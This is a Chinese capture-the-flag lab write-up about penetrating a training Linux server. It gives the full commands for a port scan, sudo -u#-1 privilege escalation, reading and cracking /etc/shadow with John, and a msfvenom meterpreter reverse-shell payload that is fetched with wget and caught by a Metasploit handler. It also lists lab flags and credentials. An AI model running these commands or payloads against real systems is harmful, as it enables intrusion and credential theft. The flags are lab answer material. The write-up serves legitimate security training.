任务三十八:Linux操作系统渗透提权
任务环境说明:
服务器场景:Server2204
服务器用户名:hacker 密码:123456
- 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
使用nmap扫描工具扫描靶机ip
Nmap -p- -T4 192.168.206.150
Flag:2283
2.使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
通过给的用户名和密码远程连接靶机
ssh hacker@靶机ip -p2283
连接成功后,使用uname命令查看服务器的主机名
Flag:KipZ1eze
3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
Flag:2.6.32-642.el6.x86_64
4.使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
使用命令history查看历史命令
这道题使用的是sudo -u#-1提权查看文件
使用命令查看/root目录下有什么文件
Sudo -u#-1 ls /root
Sudo -u#-1 cat /root/key.txt
Flag:7QcSI8kK
5.使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;
使用命令查看/etc目录下的shadow文件
Sudo -u#-1 cat /etc/shadow
在kali创建一个1.txt文档,然后把这段hash值复制到1.txt,使用john破解
由于我已经破解了这个hash值,有了缓存,所以我使用了—show,才会这样显示
Flag:Woodrow
6.使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
在kali使用msfvenom工具创建一个木马
Msfvenom -p linux/x86/meterpeter/reverse_tcp lhost=本地ip lport=1234 -f elf -o shell.elf
将这个shell.elf文件上传到/var/www/html然后打开apache2 service apache2 start
再在远程的靶机使用su root切换到root用户,再把上传的shell.elf文件下载到本地
Wget http://本地kali的ip/shell.elf
再给shell.elf提权 chmod 777 shell.elf
在kali:msfconsole
Use exploit/multi/handler
Set payload linux/x86/meterpreter/reverse_tcp
Set lhost 本地ip
Set lport 1234
Run
在靶机那端执行shell.elf木马 ./shell.elf
然后成功获取到meterpreter命令行
将png图片使用download命令现在下来就好了
Flag:uB8LUvW0